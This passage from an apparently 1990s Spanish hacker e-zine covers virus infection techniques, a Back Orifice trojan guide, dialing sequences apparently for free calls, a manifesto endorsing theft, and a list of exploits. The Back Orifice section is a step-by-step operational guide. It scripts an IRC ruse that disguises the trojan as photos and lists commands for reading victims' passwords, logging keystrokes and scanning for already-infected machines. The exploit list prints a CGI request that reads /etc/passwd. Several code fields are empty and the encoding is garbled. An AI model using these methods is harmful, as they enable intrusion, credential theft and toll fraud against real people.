 interrupcion para interrupciones que puedan serle utiles a un virus. De
 ese modo puede dar la alarma cuando un virus efectue una operacion
 extra�a a trav�s de una de estas interrupciones. Un virus con tunneling
 intenta averiguar la direccion de los gestores de interrupcion del DOS
 antes de que quedara residente el antivirus. Esto es posible porque
 como dijimos con anterioridad, el antivirus tiene que devolver el
 control a los gestores del DOS en algun momento para permitir que el
 DOS haga su trabajo. Las t�cnicas principalmente son dos: hacer un
 tracing, o buscar saltos a lo largo del codigo del gestor del antivirus
 que salten al DOS. Para ello necesitan conocer el segmento del DOS, lo
 cual se hace a trav�s de una interrupcion indocumentada del DOS. En
 realidad son m�todos poco fiables dado que son bastante evidentes y a
 veces condenados al fracaso. Muchos antivirus residentes averiguan que
 un virus les est  haciendo un tunneling y lo detiene. Cuando desarrolle
 el tema expondr� algunas t�cnicas que he descubierto hace poco, que
 subsanan la mayoria de los problemas de los tunneling tradicionales.
 Aunque hasta la fecha ningun virus las incorpora, es bueno anticiparse
 a los fallos del DOS y taparlos antes de que esto ocurra, de ahi mi
 inter�s por esta t�cnica ;)
  Otras t�cnicas se basan en el acceso al disco directamente a trav�s
 de los puertos, es decir sin necesidad de llamar a ninguna
 interrupcion. Este m�todo presenta el inconveniente de que no siempre
 funciona, por lo que es poco probable que un virus lo incorpore.

> �Sabes lo que es un virus polimorfico?
  Es un virus que modifica su apariencia en cada infeccion. Esto lo
 consigue encript ndose con una clave diferente en cada copia que hace
 de si mismo. Esto dificulta mucho las labores de busqueda de cadenas
 por parte de los antivirus, que solo pueden fijarse en las rutinas de
 desencriptacion o utilizar t�cnicas de otro tipo. Para dificultar aun
 m s la busqueda de cadenas un virus realmente polimorfico debe variar
 tambi�n la apariencia de su rutina de desencriptacion, mediante la
 insercion de NOPs aleatorios (instruccion ASM que no hace nada) y
 mediante la utilizacion de distintos registros y loops para realizar la
 desencriptacion. Se ha popularizado para este fin la realizacion de
 motores de encriptacion que son rutinas que desarrollan estas t�cnicas
 de un modo general y que se a�aden a un virus ya completo que no
 incluia polimorfismo.

> �Sabes lo que es un virus con 'armouring'?
  Es un virus que utiliza t�cnicas para dificultar ser desensamblado o
 traceado. No tienen otro fin que este, pero dado que generalmente
 cuesta muy poco realizarlas es bastante popular que un virus las
 incluya, aunque tambi�n pueden dar lugar a que un antivirus heuristico
 lo detecte. Ultimamente tambi�n se han popularizado t�cnicas de
 armouring que actuan contra un antivirus especifico, evitando las
 combinaciones de bytes que se conoce que activan la alarma heuristica o
 desactivando el antivirus residente en memoria (mal llamado tunneling).

> �Has hecho alguna vez un virus?
  Hacer un virus es una cosa divertida, con la cual se aprende mucho,
 pero que est  penada por la ley. Es mejor combatir esta lacra
 estudiando a fondo sus t�cnicas y evit ndolas, intentando siempre ir un
 paso por delante de los desarrolladores de virus.

> �Sabes infectar COMs?
  La infeccion de un COM se hace generalmente modificando los primeros
 bytes de modo que la ejecucion comience por la rutina virica que se
 a�ade al programa original a partir de su fin (virus appending). Despu�s
 de la ejecucion del virus se restaura en memoria los 3 primeros bytes
 del archivo original y se le ejecuta. De este modo el usuario no nota
 que el programa est  infectado. Otro m�todo cada vez m s en desuso es
 el de sobreescribir el codigo original del programa (virus
 overwritting). De este modo el programa original no puede ser ejecutado
 y el virus se delata con facilidad. Por supuesto puede insertarse el
 codigo del virus al principio, pero es una t�cnica que no se usa
 demasiado.

> �Sabes infectar EXEs?
  La infeccion de un EXE por el contrario no precisa de la modificacion
 del programa original. Se a�ade el codigo al final y se modifica la
 cabecera del EXE de tal modo que el punto de entrada cambie a la rutina
 virica, que despu�s cede el control al punto de entrada original.
 Tambi�n se usan t�cnicas como insertar el codigo del virus en el stack
 del EXE (zona 'hueca' que puede o no estar presente en el archivo).

> �Sabes lo que es un virus de enlace?
  Es una modalidad de virus que no precisa modificar el archivo que
 infecta. Para ello lo que hace es modificar la FAT de modo que el
 comienzo del archivo siempre apunte a un sector que contiene el virus.
 Se ejecuta este y carga el programa original. No son muy populares dado
 que precisan de un mayor trabajo y no son en general f ciles de
 detectar.

> �Sabes como funciona una busqueda heuristica?
  Ya la he mencionado numerosas veces en el texto. Es una t�cnica
 antivirus que evita la busqueda de cadenas. Para ello lo que hace es
 desensamblar el programa y ejecutarlo paso a paso, a veces mediante la
 propia CPU, a veces mediante una emulacion. De ese modo averigua qu�
 hace exactamente el programa en estudio e informa al usuario.
 Generalmente es dificil de implementar de un modo autom tica ya que se
 desconoce el conocimiento del usuario. Esto da lugar a un compromiso
 entre potencia del m�todo y falsas alarmas. En general es una buena
 t�cnica si se implementa bien y el usuario tiene un alto conocimiento
 t�cnico. La mayoria de los virus nuevos evitan directamente la busqueda
 heuristica modificando los algoritmos hasta que el programa antivirus
 no es capaz de indentificarlos.

  Bueno pues esto es todo por hoy. No es que vay is a aprender nada nuevo
 pero quedan sentados unos conocimientos b sicos y un lenguaje a
 utilizar en el resto del curso. Preguntas... ya sab�is las que quer is
 ;)

  Existen muchos puntos que no est n suficientemente detallados, cuando
 sea necesario desarrollar� cada uno, asi que no me pregunt�is sobre eso
 a raiz de esta introduccion, esperad a que llegue a ese capitulo ;)

 Patuel.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Back Orifice

							Redactora jefe:
							      Barbwired 
					     
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
							 Colaboradores:
								FREEDOM


	Este texto pretende explicar de forma clara y concisa el uso del 
BO en w95 y las posibles aplicaciones que se le pueden dar en IRC.
De ningun modo se pretende incitar a la ilegalidad y este documento se 
redacta con fines educativos, para la investigacion y prevencion del ataque.

0 - �Que es el BO?

Se trata de un troyano que se aprovecha vilmente de los bugs de seguridad
de w95/98. NO tengo constancia de su funcionamiento en NT. Quien consiga
colarle el bo a un incauto, tendra acceso a todo su sistema: Disco duro, 
cdrom, disketera, y por supuesto a sus archivos y directorios, pudiendo
borrarlos o modificarlos, bajarlos a su propio disco duro... 
(No seamos malos). 

1 - �Donde conseguir este magnifico exploit?

BO se puede conseguir en las siguientes direcciones:
www.members.xoom.com/lynx/ en la zona de download (descarga).
http://www.cultdeadcow.com/
Para una mayor informacion se recomienda visitar:
www.rootshell.com/

2 - Ya tengo el Bo.zip, �Que contiene?

El bo.zip o bo120.zip consta de una serie de archivos:

bo.txt          Oscuro documento explicativo. No se entiende mucho.
plugin.txt      Traducido en el epigrafe Apendice de este doc.
boserve.exe     El servidor autoinstalable del BO
bogui.exe       Cliente gui del BO
boclient.exe    Cliente en modo texto del BO
boconfig.exe    Utilidad de configuracion y plugin del server de BO
melt.exe        Descompresor de archivos comprimidos con el comando freeze
freeze.exe      Compresor de archivos. SE pueden descomprimir con melt.

3 - �Que hacer con todos estos archivos?

Para que todo funcione correctamente debes saber que BAJO NINGUN CONCEPTO
debes ejecutar boserve.exe, pues te haria sensible al ataque. 

Lo primero que hay que hacer es averiguar la ip del pardillo. Despues hay que 
meterle como sea el archivo boserve.exe. Y conseguir que lo ejecute. Aqui 
entra en juego la imaginacion de cada uno. El campo ideal de accion es el 
IRC. Aqui los pobres chateros de a pie hablan a sus anchas, desconocedores
del peligro que les acecha.

4- �Como le meto el BO al pardillo?

Hay que elegir una vicima que trabaje bajo windows. Todos sabemos que eso es
facil de averiguar en IRC.
Truco facil y muy visto, por tanto poco efectivo: renombrar boserve.exe
a fotos.exe. Si ya tienes algo de confianza con la victima en cuestion lo 
aceptara sin mayores problemas. Para gente mas desconfiada, intenta colarselo
despues de hacerte tu el desconfiado:

En el canal #intercambio_de_fotos_guarras_muy_fuertes:
	
        Elite: �Que tienes para cambiar?
	Pardillo: un par de fotos de Barbwired, que esta tremenda.
	E: Pero estas seguro de que es Barb de verdad?, que si no no te mando
	   nada, que ya me la han querido liar...
	P: De verdad, que me las acabo de bajar de Playboy!     
	E: Vale, pues te mando yo una de Barbwired que tb esta muy buena.
	P: Anda! Barbwired, a mi me pone toda la pila... Uf!!!
		... etc, etc, etc....
Y luego le dices que tienes un ejecutable, que es una animacion de Barbwired
con su novia (todos sabemos que Barb es bisexual). XDDD Asi te llevas por el
morro unas cuantas fotos de Barbwired y encima le cuelas el boserve.exe.

Cuando nuestro amigo Pardillo ejecute la animacion y vea que no sale Barb por
ningun lado se va a coger un cabreo de narices, y con razon. Te disculpas 
como buenamente puedas y le dices que el fichero esta defectuoso y que te lo 
vas a volver a bajar. Lo que te apetezca, pero queda bien con el tio, para 
que no se corra la voz y sigan confiando en ti y en tus fotos guarras. Es 
conveniente hacerselo a varios a la vez en privado, para tener un buen numero 
de victimas. Con la excusa de volvertelo a bajar, te sales de Irc.
Vuelves a entrar con otro nick y a trabajar. 

5 - �Como accedo al ordenador del Pardillo?

  Pasos a seguir:
  a) Copiar boclient.exe en tu directorio raiz, c:\
  b) Abrir una ventana de msdos en w95
  c) Resolver la ip de la victima. Facil de hacer en IRC. Si quieres le das
    conversacion para que no se vaya.
  d) En la ventana de msdos, desde la linea de comandos ejecutar boclient.exe
    a continuacion teclea host "IPdelPardillo", sin comillas.
  e) En teoria ya estas dentro.

6 - �Que puedo hacer una vez dentro?

Puedes hacer maravillas. Pero por algo hay que empezar:
Desde bo tecleas dir. Te mostrara los archivos de su HD.
Si tecleas passes te saldran cosas interesantes, osea, algunas passwords.
Puedes teclear cd directorio para explorar. Como en MsDos.
Facil. 

Cosas bonitas para "perfeccionistas"
Puedes abrirle el puerto http y ver su disco duro comodamente con tu 
navegador (A ver si soy capaz de hacerme entender):
Una vez dentro tienes que teclear httpon 80, o sea activar el http y el 
puerto. Si por ejemplo tiene conectado el http con otra cosa, se lo cierras
primero con httpoff y el puerto que tenga abierto. Pero, �como sabes el 
puerto que tiene abierto? �un scaneado? Ejecutas el httpon  y te dice el 
estado del http y el puerto es decir, le cierras los puertos que tenga 
abiertos y luego le abres el 80.

Mas comandos (traducido de la documentacion que acompa�a al BO):
Recuerda que en todo momento hablamos del cliente de texto, el boclient.exe.

appadd   Lanza una aplicacion de texto en un puerto tcp. Para controlar una 
	 aplicacion dos o de texto (como el command.com) via telnet.

appdel   evita que una aplicacion oiga las conexiones.

applist  Da un listado de las aplicaciones que escuchan la conexion en ese 
	 momento.

md       Crea un directorio.

dir      muestra los archivos y directorios.

rd       Borra un directorio.

shareadd Crea un export en el servidor.

sharedel Borra un export.

copy     Copia archivos.

del      Borra archivos.

find     Busca en el arbol los archivos.

freeze   Comprime un archivo

melt     Descomprime un archivo comprimido con freeze.

view     Visor del contenido de un archivo.

httpoff  Cierra el servidor http.

httpon   Abre el servidor http.

keylog   Logea las teclas que se aprietan en el servidor (victima) a un
	 archivo de texto. El log muestra el nombre de la ventana en que
	 se tecleo el texto.

keylog   stopend Acaba el log de teclado.

capavi   Captura video y audio de un dispositivo a un archivo .avi

capscreen Captura una imagen de la pantalla del server a formato .bmp

listcaps  da un listado de los dispositivos de entrada de video.

sound     ejecuta un archivo de sonido en el servidor (Te lo imaginas?).

netlist   Listado de las conexiones de red.

netdisconnect Desconecta el servidor de una red.

netconnect Conecta el servidor a una red.

netview  Ve todas las interfaces de red, servidores, dominios .

ping Hace ping al host. Da el nombre del host y la version del vo.

pluginexec Ejecuta un plugin para BO.

pluginkill Cierra el plugin.

pluginlist Da un listado de los plugin activos.

prockill   Finaliza un proceso.

proclist   Listado de los procesos en curso.

procspawn  Ejecuta un programa.

rediradd  Redirecciona los paquetes ip entrantes a otra ip

redirdel Para el redireccionamiento.

redirlist Listado de puertos de rediccionamiento activos

regmakekey Crea una entrada en el registro

regdelkey Borra una entrada en el registro.

regdelval Borra un valor del registro.

reglistkeys Listado sub llaves de una llave del registro

reglistvals Listado de los valores de una llave del registro

regsetval establece el valor de una llave del registro

resolve resuelve la direccion ip del server

dialog Crea un cuadro de dialogo con el texto que quieras y el boton ok

info Da la informacion completa del server

lockup cierra el server

passes Muestra las contrase�as del usuario actual y la del salvapantallas.
	Pueden contener basura al final.

reboot Apaga el server y lo reinicia. XDDD

tcprecv Conecta el server a una ip concreta y guarda la data recivida de esa 
	conexion al archivo especificado.

tcpsend conecta el server a una ip, manda el contenido del archivo 
	especificado y cierra la conexion


Bueno, ya vemos que se pueden hacer maravillas. Ver epigrafe 9.

8 - �Me puedo aprovechar del trabajo de otros?

Por supuesto. Otros ya han hecho la parte mas dura por ti (colar el troyano).
Puedes probar "a ciegas" desde bo cada ip, con el comando host "ip". Si te 
funciona el comando dir, ���esta infectado!!! O sea, que estas dentro.
 
Parece ser segun http://www.ntbugtraq.com/ que existen por ahi varios 
detectores de B.O. (entre ellos el BoSniffer.zip) que son en realidad 
troyanos (con el BOServer + el pluggin SpeakEasy). Este troyano intenta un 
login en el canal #BO_OWNED de un servidor IRC con un nick aleatorio 
informando ademAs de la IP del "afortunado galardonado" con el troyano.

9 - �Puedo formatearle el Disco Duro?

Os pido encarecidamente que no os paseis. No hagais putadas.
Robad fotos porno, cread un dir "Pervertido" o "Mehemetidoentuvida".
Intentad acceder al cdrom. Ejecutadle un archivo de sonido. 
Que flipe, pero no abuseis.
Si hace un Netstat vera vuestra ip. Y sabeis que con la IP, y la hora en
que ocurrio todo, el ISP y Timonica, de la mano como hermanos, os pueden 
recomendar un bello hotelito... lo de siempre, precaucion. 

Apendice - �Como puedo escribir mi propio plugin para Back Orifice?
   (Traduccion del original que acompa�a al programa)

Para escribir tu propio plugin para el Back Orifice, solo tienes que crear
una DLL con funciones del tipo:

char *YourFunc(int *active, char *args)

El comando de ejecucion del plugin te permite especificar una dll y un nombre
de funcion del tipo: "dll:_Function". El resto de los parametros son pasados
a tu funcion en los args de los parametros. La unica cosa de la que se ocupa
tu aplicacion es de monitorizar la int al que apunta el activo.
Si ese valor se vuelve 0, el usuario ha pedido que el plugin termine y tu
funcion deberia restablecerse en lo mas rapidamente posible en cuanto se 
cierre todo lo que haga falta ser cerrado.
Tu programa puede devolver NULL, o puede devolver a un pointer que apunte a
un bufffer estatico que contenga un mensaje de texto que sera ofrecido al 
usuario.
La DLL no se cargara hasta que el texto se copie desde ese buffer.
Y eso es todo lo que hay.


Nota de los autores:
Los acentos se han omitido en aras de la compatibilidad.
La traduccion de la documentacion original ha resultado dificultosa y ha 
originado giros linguisticos imposibles. A aquellos mas familiarizados con
textos tecnicos, o que hayan detectado faltas al rigor, se les pide su 
colaboracion.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                               <>
                           (Aportacion de Juan Pablo)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Paso 1. Marcar el tel�fono 629-99-10,
Paso 2. Cuando suene una Voz ...
Paso 3. En seguida Marcar 8019, y
Paso 4. Cuando suene un Tono, en seguida...
Paso 5. Marcar la Lada del Pais y/o Regi�n , y por �ltimo ...
Paso 6. Marcar el Tel�fono deseado + el bot�n con la 
siguientefigura # (Gato).


CASO II

Paso 1. Marcar el tel�fono 258-65-01 + el bot�n con la
siguiente figura#(Gato).
Paso 2. Cuando suene un Tono , enseguida ...
Paso 3. Marcar 02641414866960, despu�s ...
Paso 4. Marcar la Lada del Pais y/o Regi�n y por �ltimo ...
Paso 5. Marcar el Tel�fono deseado.


CASO III

Paso 1. Marcar el tel�fono 725-63-99,
Paso 2. Cuando suene un Tono ...
Paso 3. En seguida Marcar 00.
Paso 4. Esperar otro Tono y ...
Paso 5. En seguida volver a Marcar 00, despu�s ...
Paso 6. Marcar la Lada del Pa�s y/o Regi�n y por �ltimo ...
Paso 7. Marcar el tel�fono deseado.


CASO IV

Paso 1. Marcar el tel�fono 258-65-01 + el bot�n con la
siguiente figura# (Gato) .
Paso 2. Cuando suene una voz, en seguida
Paso 3. Marcar 02641414866960, despu�s ...
Paso 4. Marcar la Lada del Pais y/o Regi�n y por �ltimo ...
Paso 5. Marcar el Tel�fono deseado.


CASO V - A

Paso 1. Marcar el tel�fono 420-98-98.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 7676, despu�s ...
Paso 4. Marcar 098 (Lada Internacional) y por �ltimo ...
Paso 5. Marcar el Tel�fono deseado + el bot�n con la
siguiente figura# (Gato).


CASO V - B

Paso 1. Marcar el tel�fono 420-98-98.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 7676, despu�s ...
Paso 4. Marcar 095 (Lada USA-CANADA) y por �ltimo ... 
Paso 5. Marcar el Tel�fono deseado + el bot�n con la
siguiente figura# (Gato).


CASO V - C

Paso 1. Marcar el tel�fono 420-98-98.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 7676, despu�s ...
Paso 4. Marcar 098 (Lada Nacional) y por �ltimo ...
Paso 5. Marcar el Tel�fono deseado + el bot�n con la
siguiente figura# (Gato).


CASO VI

Paso 1. Marcar el tel�fono 91-800-01-670.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 94678, 
Paso 4. Cuando suene un Tono, en seguida
Paso 5. Marcar 55,
Paso 6. Cuando suene un Tono, en seguida
Paso 7. Marcar 98, por �ltimo ...
Paso 8. Marcar el Tel�fono deseado.
NOTA IMPORTANTE : Este Caso (VI) S�lo se aplica
en llamadas Internacionales (Europa y el resto del
mundo, exceptuando Estados Unidos y Canada).


CASO VII

Paso 1. Marcar el tel�fono 722-73-56,
Paso 2. Espere y cuando suene una Voz ...
Paso 3. En seguida Marque 7349, 
Paso 4. Espere y cuando suene una voz, 
Paso 5. En seguida Marque 7349, 
Paso 6. Espere y cuando suene un Tono, 
Paso 7. En seguida Marque 0 (cero), 
Paso 8. Espere y cuando suene un Tono, 
Paso 9. Marque la Lada del Pais y/o Regi�n , y por �ltimo ... 
Paso 10. Marque el Tel�fono deseado.


CASO VIII

Paso 1. Marcar el tel�fono 91-800-92-450 + el bot�n con 
la siguiente figura#(Gato).
Paso 2. Marcar 100-54 + el bot�n conla siguiente figura
#(Gato).
Paso 3. Marcar 1054 + el bot�n conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despu�s ...
Paso 5. Marcar la Lada del Pais y/o Regi�n y por �ltimo ...
Paso 6. Marcar el Tel�fono deseado.


CASO IX

Paso 1. Marcar el tel�fono 91-800-92-450 + el bot�n con 
la siguiente figura#(Gato).
Paso 2. Marcar 200-26 + el bot�n conla siguiente figura
#(Gato).
Paso 3. Marcar 2026 + el bot�n conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despu�s ...
Paso 5. Marcar la Lada del Pais y/o Regi�n y por �ltimo ...
Paso 6. Marcar el Tel�fono deseado.


CASO X

Paso 1. Marcar el tel�fono 91-800-92-450 + el bot�n con 
la siguiente figura#(Gato).
Paso 2. Marcar 300-31 + el bot�n conla siguiente figura
#(Gato).
Paso 3. Marcar 3031 + el bot�n conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despu�s ...
Paso 5. Marcar la Lada del Pais y/o Regi�n y por �ltimo ...
Paso 6. Marcar el Tel�fono deseado.


CASO XI

Paso 1. Marcar el tel�fono 91-800-92-450 + el bot�n con 
la siguiente figura#(Gato).
Paso 2. Marcar 300-38 + el bot�n conla siguiente figura
#(Gato).
Paso 3. Marcar 3038 + el bot�n conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despu�s ...
Paso 5. Marcar la Lada del Pais y/o Regi�n y por �ltimo ...
Paso 6. Marcar el Tel�fono deseado.


CASO XII

Paso 1. Marcar el tel�fono 91-800-92-450 + el bot�n con 
la siguiente figura#(Gato).
Paso 2. Marcar 300-51 + el bot�n conla siguiente figura
#(Gato).
Paso 3. Marcar 3051 + el bot�n conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despu�s ...
Paso 5. Marcar la Lada del Pais y/o Regi�n y por �ltimo ...
Paso 6. Marcar el Tel�fono deseado.


CASO XIII

Paso 1. Marcar el tel�fono 91-800-92-450 + el bot�n con 
la siguiente figura#(Gato).
Paso 2. Marcar 300-26 + el bot�n conla siguiente figura
#(Gato).
Paso 3. Marcar 3026 + el bot�n conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), despu�s ...
Paso 5. Marcar la Lada del Pais y/o Regi�n y por �ltimo ...
Paso 6. Marcar el Tel�fono deseado.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

		   ----------------------
		--- Reflexiones de nadie --- ---------------
		   ----------------------  -- Por: Mr.Nexus --
					     ---------------

        Esta tarde sali a la calle, apareci en el mundo real, como tantas
veces, y como siempre me canse de �l.
       Vaya un mundo real en el que la gente solo piensa en matarse los unos a 
los otros, me da verg�enza pertenecer a un grupo de personas asi, �por que 
diablos tiene que haber tanta violencia en nuestra sociedad?, gente que solo 
piensa en hacer da�o a los dem s (eso de los fines educativos debe ser una 
utopia), y �personas? que no tienen m s cerebro que el necesario como para 
decir las payasadas que salen por sus bocas, en fin... espero que cuando 
crezcan maduren y no se queden tan ... gilipollas.

        Por la noche me conecto a la red, por fin! llevaba todo el dia 
pensando en lo que iba a hacer, lo que me iba a bajar, lo que iba a probar, 
bien! me voy sintiendo como en casa, al fin y al cabo ... esta es mi casa, 
aqui es donde me siento bien, donde me siento a gusto con la gente, gente que 
aqui no son mas que un apodo que se ponen ellos mismos, son gente ... somos 
gente que dejamos atras nuestros prejuicios, nuestros problemas, ...

        Pero aaah!, que gran decepcion, ahora Internet se esta expandiendo y 
regalan conexiones con las cajas de galletas, �qu� hace esto?, pues facil 
respuesta, esto hace que todo el mundo que tenga ordenador y modem se pueda 
conectar, vaya! esto ya no me gusta, empiezo a verme rodeado de esos 
gilipollas del mundo real que olvid� al entrar en mi mundo. Malditos sean! es 
que no se puede estar tranquilo en el IRC, por ejemplo, sin que venga algun 
payaso a insultarte, nukearte, ...
	La respuesta es no, con lo f cil que es ahora entrar en la red, Toda 
esa gentuza indeseable se mete en nuestro mundo, si!, seguro que alguno de 
esos cabrones esta leyendo estas lineas y ahora esta diciendo, bufff! Pues 
tienes razon, esta conducta no lleva a nada, ... pero cuando apague su 
ordenador seguir  llendo por ahi con la violencia en las manos y la estupidez 
en la cabeza, y mas tarde ... cuando se conecte con el bancotal o con el 
bancocual a Internet seguir  haciendo lo mismo, pero de otra manera, 
aprovechadote de la gente que ha desarrollado nukes (por ejemplo) por el puro 
af n de superacion, abusando de la gente que te da el op en algun canal, ... 
tan solo son unos pobres hombrecillos.

	Hey!, tu!, lector!, acaso no piensas como yo?, dime la verdad, a quien 
le interesa ir por ahi molestando a la gente?, ir por ahi tan solo buscando 
problemas?, no lo sabes?, yo te lo dir�, a los pobres de mente que se dejan 
llevar por las modas, por los estereotipos, a los pringaos que solo piensan en 
hacer da�o a los dem s sin causa aparente.

	Hey! no pienses que soy un flojo y un lila, jaja! bueno, un poco si, 
... tan solo me gustaria vivir en un mundo en el que no existiera la 
violencia, las guerras, el hambre, las masacres de humanos iguales que 
nosotros pero con la *mala suerte* de haber nacido en otro lugar; me gustaria 
vivir en un mundo sin racismo, sin prejuicios, sin gentuza a la que solo le 
interesa su propio beneficio, y a ti? no te gustaria vivir en ese mundo?, si.
	Antes ese mundo era el cyberespacio, un sitio bonito, agradable, 
curioso, moderno, infinito, ... perfecto, pero entonces llegaron ellos, y nos 
tuvieron que joder el invento, ... gentuza ...
        Desde aqui tan solo puedo regocijarme en mis pensamiento que, por 
ahora, son solo mios, pero tambi�n puedo decirte que no te rindas amigo 
hacker, lo que haces es la aficion mejor remunerada del mundo, como? que no 
ganas dinero? ya lo se, pero no se trata de eso verdad? , y ese afan de 
superacion? , esa curiosidad satisfecha? eres simplemente admirable, y por eso 
quiero ser como tu, tu el hacker, no creo que a nadie le importe que 
transfieras a tu cuenta varios millones del dinero que ha acumulado un sucio 
chupon que ha explotado a sus trabajadores, o un politico que se ha llenado 
sus bolsillos con el dinero de los ciudadanos, cr�eme, nadie reprocharia tal
acto.
	Por todo lo que hacen los hackers autenticos, os admiro, admiro a la 
gente de Raregazz, porque de veras comparten su conocimiento; admiro a los 
componentes de X-ploit, porque reclaman derechos humanos; admiro a Cy de 
CyberHack, porque no se calla al criticar a esos que se aprovechan del trabajo 
de los dem s; ... y asi a todos aquellos que se esfuerzan en superarse dia a 
dia porque sois geniales, hummm, por que no decirlo? Somos geniales, estamos 
muy por encima de toda esa gente que solo busca ... bah! tonterias.

        Bueno, esto se acaba, sino seguro que te duermes, en fin tan solo Una 
ultima cosa, te pido que si *realmente* piensas como yo, ... como nosotros, 
unete a nosotros, todavia quedan lugares en la red a los que esta Restringido 
el paso a los debiles de mente, se fuerte!, resiste las acometidas de una 
sociedad que da asco y rebelate!, tomaremos sus sistemas, exterminaremos las 
plagas de bastardos, es contra ellos contra los que tienes que rebelarte! y 
cuando te canses, disfruta de la compa�ia de la buena gente con la que te vas 
cruzando a lo largo de tu vida, esos son tus amigos, nosotros somos tus 
amigos.

   ------------------------------------------------------------------------
     Para cualquier critica,    "Las guerras las declaran los gobiernos
     alabanza o correccion:           y las sufren los pueblos"
                                  Cristina Almeida (politica Espa�ola)
       
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
           ^-- parece mentira eh? --^
	-----------------------------------------------------
	   ------------ Insultos a dev/null --------------
		----------------------------------

  ������������������������������������������������������������������������ͻ
  �                            BUGS Y EXPLOITS                             �
  �                               por PaTa                                 �
  ������������������������������������������������������������������������ͼ

-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: Netscape 3.x y 4.x                                             
Objetivo:     DoS usando nested tables demtro de etiquetas span
Parche:       -
Creditos:     Leonid Ksido
Descripcion:  Testeado en Communicator 4.05 en Linux Slackware 3.4, y
	      Navigator 4.05 en Windows 98
Codigo:
		    
		    
		    
		    
		    
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: CGI-Script
Objetivo:     Ejecutar comandos de forma remota
Parche:       Quitar `faxsurvey.orig'
Creditos:     Tom <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
Descripcion:  Existe un bug en el "faxsurvey" CGI-Script, que permite 
	      ejecutar comandos en el servidor HTTP
	      Versiones afectadas S.u.S.E. 5.1 y 5.2 Linux. 
Codigo:       http://joepc.linux.elsewhere.org/cgi-
bin/faxsurvey?/bin/cat%20/etc/passwd
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Linux RedHat 5.1
Objetivo:     DoS
Parche:       ftp://ftp.solucorp.qc.ca/pub/linuxconf/devel/redhat-
5.1/linuxconf-1.11r19-1.i386.rpm
Creditos:     Alex Mottram
Descripcion:  Existe un problema de seguridad con linuxconf-1.11.r11-rh3/i386 
si lo
	      actualizas desde el FTP de RedHAT.
Codigo:       -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: HOTMAIL
Objetivo:     Obtener las claves de los usuarios
Parche:       Descativar Java
Creditos:     Tom Cervenka
Descripcion:  Mediante al ejecucion de un codigo en java malicioso al leer
	      los mensajes con el navegador que estemos usando, que fuerza
	      al usuario a volver a registrarse e introducir de nuevo su
              cuenta y su contrase�a, sin saber que en realidad esta mandando
	      al atacante estos datos.
Codigo:
			 
			 
"Go where you want today" - Blue Adept
			 
			 
			 
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Win98
Objetivo:     Efecto 2000
Parche:       No encender el ordenador en Noche Vieja
Creditos:     -
Descripcion:  El bug aparece cuando Windows 98 es reiniciado entre las 23:59
	      y las 00:00 y hace que el ordenador salte uno o dos dias hacia
	      atras, de pendiendo de la hora exacta de reset. Por ahora esto
	      solo ocuure el 31 de Diciembre.
Codigo:       -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa:  Internet Explorer 
Objetivo:      Leer ficheros locales
Parche:        http://www.microsoft.com/security/bulletins/ms98-013.htm
Creditos:      Georgi Guninski
Descripcion:   Esta nueva vulnerabilidad permite a una p gian Web dise�ada
	       maliciosamente leer archivos de texto o html del ordenador del
	       usuario y enviar sus contenidos a un host arbitrario, incluso
	       cuando el usuario se encuentra detr s de un firewall. El
	       agujero explota un error de seguridad en los frames y se basa
               en la utilizacion de instrucciones en JavaScript. Para que
	       funcione se debe conocer de antemano el nombre y camino
	       completo del fichero que se quiere leer, cosa nomuy dificil.

	       Versiones afectadas:
	       - Microsoft Internet Explorer 4.0, 4.01 y 4.01 SP1 sobre
		 Windows NT 4.0, Windows 95
	       - Microsoft Windows 98, Internet Explorer iontegrado
		 (version 4.01 SP1)
	       - Microsoft Internet Explorer 4.0 y 4.01 para Windows 3.1
		 y Windows NT 3.51
	       - Microsoft Internet Explorer 4.0 y 4.01 para Macintosh
	       - Microsoft Internet Explorer 3.x
Codigo:




This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other
versions), which allows reading text or HTML file on the user's machine.
Create the file c:\test.txt and its contents are shown in a message
box. The file may be sent to an arbitrary server even if behind a firewall.


To test it, you need Javascript enabled.


This file is created by Georgi Guninski.






[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

                               $$$$$                $$
      "$$$$$$$$$$$$$$$"           $$       ooo    $$$$$ooo         oooo
